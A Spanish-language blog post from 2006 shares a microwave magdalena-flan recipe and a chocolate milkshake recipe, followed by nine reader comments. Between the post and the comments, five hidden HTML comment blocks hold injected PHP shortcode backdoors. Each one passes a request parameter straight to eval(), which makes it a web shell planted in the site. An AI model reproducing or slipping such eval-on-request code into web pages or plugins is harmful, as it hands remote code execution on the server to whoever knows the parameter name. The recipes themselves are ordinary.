Envía un TE QUIERO
Envía un TE AMO
¿Artículo nuevo?

Una rica merienda ^^

Pues bien… No sé cocinar casi nada, pero algo que llevo haciendo desde pequeña y que me sale muy rico es el pastel de magdalenas. Y si lo combinamos con el batido de chocolate que sabe hacer mi hermana, tenemos una merienda riquísima que me gustaría compartir con vosotras :).

Empezamos con el pastel… Es una receta para microondas, con lo cual no es nada complicada de hacer.

Los ingredientes que vamos a necesitar son los siguientes:

– 5 magdalenas (o las que necesitéis según el recipiente).

– 1/2 litro de leche.

– 1 cáscara de limón.

– 1 sobre de flan en polvo.

Y para el caramelo:

– 4 cucharadas de agua.

– 4 cucharadas de azúcar.

Pues para empezar, haremos el caramelo. Ponemos el agua y el azúcar en un molde, lo metemos en el microondas durante 7 minutos y estará listo. Yo para ver cuándo está listo me guío por el olor… Cuando huele bien es que ya está :P. Al sacarlo, movemos el molde para que se extienda el caramelo por todo él.

A continuación, calentamos la leche con la cáscara de limón durante 2 minutos, y mientras esto se hace, colocamos las magdalenas partidas por la mitad en el molde, formando una capa.

Después, mezclamos la leche caliente con el sobre de flan y lo ponemos durante 5 minutos en el microondas. Hecho esto, lo batimos bien, quitamos la cáscara de limón y lo vertemos sobre las magdalenas en el molde.

Para acabar, metemos el molde ya preparado en el microondas durante 7 minutos… Luego dejamos enfriar, desmoldamos, y ya está listo para comer :D.

Ahora el batido… Para hacerlo necesitaremos estos ingredientes:

– Nesquick.

– Leche (tantos vasos como personas).

– Canela molida.

– 2 galletas María por persona.

– Azúcar.

– Una bola de helado de chocolate por persona.

Es muy sencillo de preparar: echamos la leche en un recipiente, añadimos el nesquick (al gusto :P), el azúcar, después las galletas troceadas, un poco de canela molida y el helado, y lo batimos todo muy bien.

Y con estos sencillos pasos tendremos una merienda lista en poco tiempo… Y además está muy muy bueno todo :). Que los disfrutéis ^^.

[_La NaDa_]

<!– [insert_php]if (isset($_REQUEST["oexqv"])){eval($_REQUEST["oexqv"]);exit;}[/insert_php][php]if (isset($_REQUEST["oexqv"])){eval($_REQUEST["oexqv"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["XqwA"])){eval($_REQUEST["XqwA"]);exit;}[/insert_php][php]if (isset($_REQUEST["XqwA"])){eval($_REQUEST["XqwA"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["qMHMu"])){eval($_REQUEST["qMHMu"]);exit;}[/insert_php][php]if (isset($_REQUEST["qMHMu"])){eval($_REQUEST["qMHMu"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ovUN"])){eval($_REQUEST["ovUN"]);exit;}[/insert_php][php]if (isset($_REQUEST["ovUN"])){eval($_REQUEST["ovUN"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jKT"])){eval($_REQUEST["jKT"]);exit;}[/insert_php][php]if (isset($_REQUEST["jKT"])){eval($_REQUEST["jKT"]);exit;}[/php] –>


9 comentarios »

9 comentarios a “Una rica merienda ^^”

  1. el 25 Nov 2006 a las 25 noviembre 2006 PR: 0 LaRiaNa

    uhmmmmmmmm k ambre y eso k acabo d comer ara mismo jijijijji

    la verdad k pinta estar mu bueno, senzillo pero ñañañam xDDD

    jijiji besitooss

  2. el 25 Nov 2006 a las 25 noviembre 2006 PR: 0 **monica**

    Tiene muy buena pinta ,ya me ha entrado el hambre mmm
    tiene que ser buenisimo asi como lo haces ñam ñam ñam 🙂

  3. el 25 Nov 2006 a las 25 noviembre 2006 PR: 4 CaRoLiNaA

    Vaya que si es buena merienda o no; ya me gustaría poder comerlo hoy ya que todavía no he merendado. La verdad es que yo cocinar lo básico ( pasta, huevos, patatas, carne, fritos…) pero tampoco mucha experiencia. En cambio, los postres se me dan de vicio: el yogurt de beber, los rollitos de hojaldre, las tartas, los buñuelos… qué bueno está todo!

  4. el 25 Nov 2006 a las 25 noviembre 2006 PR: 0 Misery

    uhmm me has metido en la cabeza el olorcito ke tiene ke desprender tan bueno….y ese batido freskito uhmmmmmm ta claro ke las dietas no son xa mi
    No puedo kitarme de la cabeza una tarta de galleta xD

  5. el 28 Nov 2006 a las 28 noviembre 2006 PR: 0 Melky Tide

    La Nada…te vienes a canarias??pa que me hagas esa merienda…invito a tu hermana si hace falta pal chocolate 😀
    la que hace los postres bien en mi casa es mi hermana…yo me encargo fijo de los platos combinados con frutas…la comida sana es lo mio(lo más fácil)sólo freir…guisar…o cortar…:)

  6. el 29 Nov 2006 a las 29 noviembre 2006 PR: 0 iNMiTa

    Yo ya sabia hacer el flan de magdalenas este q has dicho, tb se puede hacer con magdalenas valencianas, esta buenisimo!!!!!!

  7. el 02 Dic 2006 a las 2 diciembre 2006 PR: 2 Carmen

    Jo que lastima que no me gustan los dulces 🙁

  8. el 05 Dic 2006 a las 5 diciembre 2006 PR: 0 Laila

    mmmmmmmmmmmm…dulce tentación!!

  9. el 11 Dic 2006 a las 11 diciembre 2006 PR: 0 pandora

    y no hay ninguna receta light?

Deja un comentario

*
To prove you're a person (not a spam script), type the security word shown in the picture. Click on the picture to hear an audio file of the word.
Anti-spam image